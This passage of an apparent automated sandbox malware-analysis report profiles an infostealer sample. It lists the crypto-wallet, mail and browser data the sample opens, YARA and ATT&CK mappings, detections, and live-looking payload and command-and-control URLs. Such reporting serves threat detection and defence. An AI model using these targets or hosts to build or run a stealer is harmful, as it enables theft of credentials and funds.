                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVN
                  Source: Yara matchFile source: 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: tMO4FVIc9l.exe PID: 3108, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6472, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 500, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4340, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5920, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3160, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6472, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5920, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 500, type: MEMORYSTR
                  Source: Yara matchFile source: 00000000.00000003.2155682026.0000000006044000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2259208520.000000000611B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: tMO4FVIc9l.exe PID: 3108, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\KBHGMwjOItm_DLNJJFRnML7.zip, type: DROPPED
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  11
                  Deobfuscate/Decode Files or Information
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job
                  1
                  Scheduled Task/Job
                  411
                  Process Injection
                  2
                  Obfuscated Files or Information
                  LSASS Memory12
                  File and Directory Discovery
                  Remote Desktop Protocol31
                  Data from Local System
                  21
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  PowerShell
                  1
                  Registry Run Keys / Startup Folder
                  1
                  Scheduled Task/Job
                  1
                  Software Packing
                  Security Account Manager44
                  System Information Discovery
                  SMB/Windows Admin Shares1
                  Screen Capture
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                  Registry Run Keys / Startup Folder
                  1
                  DLL Side-Loading
                  NTDS261
                  Security Software Discovery
                  Distributed Component Object Model1
                  Email Collection
                  3
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Masquerading
                  LSA Secrets12
                  Virtualization/Sandbox Evasion
                  SSH2
                  Clipboard Data
                  114
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials1
                  Process Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items411
                  Process Injection
                  DCSync1
                  System Network Configuration Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446871 Sample: tMO4FVIc9l.exe Startdate: 24/05/2024 Architecture: WINDOWS Score: 100 52 employhabragaomlsp.shop 2->52 54 ipinfo.io 2->54 56 db-ip.com 2->56 66 Snort IDS alert for network traffic 2->66 68 Found malware configuration 2->68 70 Antivirus detection for URL or domain 2->70 72 10 other signatures 2->72 8 tMO4FVIc9l.exe 1 77 2->8         started        13 MSIUpdaterV202.exe 2->13         started        15 AdobeUpdaterV202.exe 2->15         started        17 4 other processes 2->17 signatures3 process4 dnsIp5 60 5.42.65.116, 49710, 49714, 50500 RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU Russian Federation 8->60 62 ipinfo.io 34.117.186.192, 443, 49711 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 8->62 64 db-ip.com 104.26.5.15, 443, 49712 CLOUDFLARENETUS United States 8->64 44 C:\Users\user\...\xq6J5KlULX6jlR3rET0T.exe, PE32 8->44 dropped 46 C:\Users\user\AppData\...\lumma2305[1].exe, PE32 8->46 dropped 48 C:\Users\user\...\AdobeUpdaterV202.exe, PE32 8->48 dropped 50 2 other malicious files 8->50 dropped 96 Tries to steal Mail credentials (via file / registry access) 8->96 98 Found many strings related to Crypto-Wallets (likely being stolen) 8->98 100 Uses schtasks.exe or at.exe to add and modify task schedules 8->100 102 Tries to harvest and steal browser information (history, passwords, etc) 8->102 19 xq6J5KlULX6jlR3rET0T.exe 8->19         started        22 schtasks.exe 1 8->22         started        24 schtasks.exe 1 8->24         started        26 WerFault.exe 8->26         started        104 Antivirus detection for dropped file 13->104 106 Multi AV Scanner detection for dropped file 13->106 108 Machine Learning detection for dropped file 13->108 28 RegAsm.exe 13->28         started        110 Writes to foreign memory regions 15->110 112 Allocates memory in foreign processes 15->112 114 Injects a PE file into a foreign processes 15->114 30 RegAsm.exe 15->30         started        32 RegAsm.exe 17->32         started        34 RegAsm.exe 17->34         started        file6 signatures7 process8 signatures9 74 Antivirus detection for dropped file 19->74 76 Multi AV Scanner detection for dropped file 19->76 78 Machine Learning detection for dropped file 19->78 88 5 other signatures 19->88 36 RegAsm.exe 19->36         started        40 conhost.exe 22->40         started        42 conhost.exe 24->42         started        80 Query firmware table information (likely to detect VMs) 30->80 82 Tries to harvest and steal browser information (history, passwords, etc) 30->82 84 Tries to steal Crypto Currency Wallets 30->84 86 Found many strings related to Crypto-Wallets (likely being stolen) 32->86 process10 dnsIp11 58 employhabragaomlsp.shop 188.114.96.3, 443, 49715, 49716 CLOUDFLARENETUS European Union 36->58 90 Query firmware table information (likely to detect VMs) 36->90 92 Found many strings related to Crypto-Wallets (likely being stolen) 36->92 94 Tries to steal Crypto Currency Wallets 36->94 signatures12

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  tMO4FVIc9l.exe42%ReversingLabs
                  tMO4FVIc9l.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe100%AviraHEUR/AGEN.1317026
                  C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe100%AviraHEUR/AGEN.1317026
                  C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe100%AviraHEUR/AGEN.1317026
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\lumma2305[1].exe100%AviraHEUR/AGEN.1317026
                  C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe100%Joe Sandbox ML
                  C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\lumma2305[1].exe100%Joe Sandbox ML
                  C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe45%ReversingLabsWin32.Trojan.Zusy
                  C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe45%ReversingLabsWin32.Trojan.Zusy
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\lumma2305[1].exe45%ReversingLabsWin32.Trojan.Zusy
                  C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe45%ReversingLabsWin32.Trojan.Zusy
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://db-ip.com/0%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll0%URL Reputationsafe
                  http://upx.sf.net0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  https://ipinfo.io/Mozilla/5.00%URL Reputationsafe
                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  https://ipinfo.io/0%URL Reputationsafe
                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt0%URL Reputationsafe
                  https://t.me/risepro_botD0%Avira URL Cloudsafe
                  https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                  https://employhabragaomlsp.shop/pi0%Avira URL Cloudsafe
                  http://www.winimage.com/zLibDll0%URL Reputationsafe
                  https://employhabragaomlsp.shop/apiY0%Avira URL Cloudsafe
                  https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                  https://employhabragaomlsp.shop/apih0%Avira URL Cloudsafe
                  http://5.42.65.116/lumma2305.exej100%Avira URL Cloudphishing
                  http://5.42.65.116/lumma2305.exe~100%Avira URL Cloudphishing
                  http://5.42.65.116/lumma2305.exeMeleonCH100%Avira URL Cloudphishing
                  https://support.mozilla.org0%URL Reputationsafe
                  https://employhabragaomlsp.shop:443/api0%Avira URL Cloudsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  https://employhabragaomlsp.shop/l0%Avira URL Cloudsafe
                  https://employhabragaomlsp.shop/aibcnf0%Avira URL Cloudsafe
                  https://employhabragaomlsp.shop/i0%Avira URL Cloudsafe
                  averageaattractiionsl.shop0%Avira URL Cloudsafe
                  https://db-ip.com/demo/home.php?s=8.46.123.1750%Avira URL Cloudsafe
                  buttockdecarderwiso.shop0%Avira URL Cloudsafe
                  http://5.42.65.116/lumma2305.exeaTTm100%Avira URL Cloudphishing
                  https://ipinfo.io/Y0%Avira URL Cloudsafe
                  https://employhabragaomlsp.shop/s0%Avira URL Cloudsafe
                  employhabragaomlsp.shop0%Avira URL Cloudsafe
                  http://5.42.65.116/lumma2305.exeEWPz100%Avira URL Cloudphishing
                  http://5.42.65.116/lumma2305.exe100%Avira URL Cloudphishing
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                  roomabolishsnifftwk.shop0%Avira URL Cloudsafe
                  https://employhabragaomlsp.shop:443/apihrome0%Avira URL Cloudsafe
                  https://t.me/RiseProSUPPORT0%Avira URL Cloudsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                  http://5.42.65.116/lumma2305.exeto.de100%Avira URL Cloudphishing
                  https://employhabragaomlsp.shop/api(0%Avira URL Cloudsafe
                  https://t.me/risepro_bot0%Avira URL Cloudsafe
                  https://db-ip.com:443/demo/home.php?s=8.46.123.1750%Avira URL Cloudsafe
                  https://employhabragaomlsp.shop/api0%Avira URL Cloudsafe
                  femininiespywageg.shop0%Avira URL Cloudsafe
                  https://employhabragaomlsp.shop/apiO0%Avira URL Cloudsafe
                  https://ipinfo.io:443/widget/demo/8.46.123.175F0%Avira URL Cloudsafe
                  https://employhabragaomlsp.shop/apiP0%Avira URL Cloudsafe
                  https://ipinfo.io/widget/demo/8.46.123.1750%Avira URL Cloudsafe
                  civilianurinedtsraov.shop0%Avira URL Cloudsafe
                  https://employhabragaomlsp.shop/80%Avira URL Cloudsafe
                  museumtespaceorsp.shop0%Avira URL Cloudsafe
                  https://employhabragaomlsp.shop/0%Avira URL Cloudsafe
                  stalfbaclcalorieeis.shop0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  employhabragaomlsp.shop
                  188.114.96.3
                  truetrue
                    unknown
                    ipinfo.io
                    34.117.186.192
                    truefalse
                      unknown
                      db-ip.com
                      104.26.5.15
                      truefalse
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        averageaattractiionsl.shoptrue
                        • Avira URL Cloud: safe
                        unknown
                        https://db-ip.com/demo/home.php?s=8.46.123.175false
                        • Avira URL Cloud: safe
                        unknown
                        buttockdecarderwiso.shoptrue
                        • Avira URL Cloud: safe
                        unknown
                        employhabragaomlsp.shoptrue
                        • Avira URL Cloud: safe
                        unknown
                        http://5.42.65.116/lumma2305.exetrue
                        • Avira URL Cloud: phishing
                        unknown
                        roomabolishsnifftwk.shoptrue
                        • Avira URL Cloud: safe
                        unknown
                        https://employhabragaomlsp.shop/apitrue
                        • Avira URL Cloud: safe
                        unknown
                        femininiespywageg.shoptrue
                        • Avira URL Cloud: safe
                        unknown
                        https://ipinfo.io/widget/demo/8.46.123.175false
                        • Avira URL Cloud: safe
                        unknown
                        civilianurinedtsraov.shoptrue
                        • Avira URL Cloud: safe
                        unknown
                        museumtespaceorsp.shoptrue
                        • Avira URL Cloud: safe
                        unknown
                        stalfbaclcalorieeis.shoptrue
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabtMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://5.42.65.116/lumma2305.exeMeleonCHtMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: phishing
                        unknown
                        http://5.42.65.116/lumma2305.exejtMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: phishing
                        unknown
                        https://duckduckgo.com/ac/?q=tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://employhabragaomlsp.shop:443/apiRegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://t.me/risepro_botDtMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://db-ip.com/tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://5.42.65.116/lumma2305.exe~tMO4FVIc9l.exe, 00000000.00000002.2259208520.0000000006162000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: phishing
                        unknown
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://employhabragaomlsp.shop/apihRegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://employhabragaomlsp.shop/apiYRegAsm.exe, 00000015.00000002.2456254141.000000000147C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://employhabragaomlsp.shop/piRegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://employhabragaomlsp.shop/aibcnfRegAsm.exe, 00000019.00000002.2498499806.0000000000B98000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://employhabragaomlsp.shop/lRegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://employhabragaomlsp.shop/iRegAsm.exe, 00000019.00000002.2498499806.0000000000B98000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://employhabragaomlsp.shop/sRegAsm.exe, 00000015.00000002.2456254141.00000000014D3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.2498499806.0000000000B98000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://5.42.65.116/lumma2305.exeaTTmtMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://ipinfo.io/YtMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014D8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://5.42.65.116/lumma2305.exeEWPztMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icotMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://employhabragaomlsp.shop:443/apihromeRegAsm.exe, 0000000C.00000002.2244993517.000000000118F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dlltMO4FVIc9l.exe, 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://upx.sf.netAmcache.hve.15.drfalse
                        • URL Reputation: safe
                        unknown
                        https://t.me/RiseProSUPPORTtMO4FVIc9l.exe, 00000000.00000002.2258511211.000000000146E000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000002.2259208520.000000000611B000.00000004.00000020.00020000.00000000.sdmp, KBHGMwjOItm_DLNJJFRnML7.zip.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://5.42.65.116/lumma2305.exeto.detMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://employhabragaomlsp.shop/api(RegAsm.exe, 00000019.00000002.2499274804.000000000309D000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
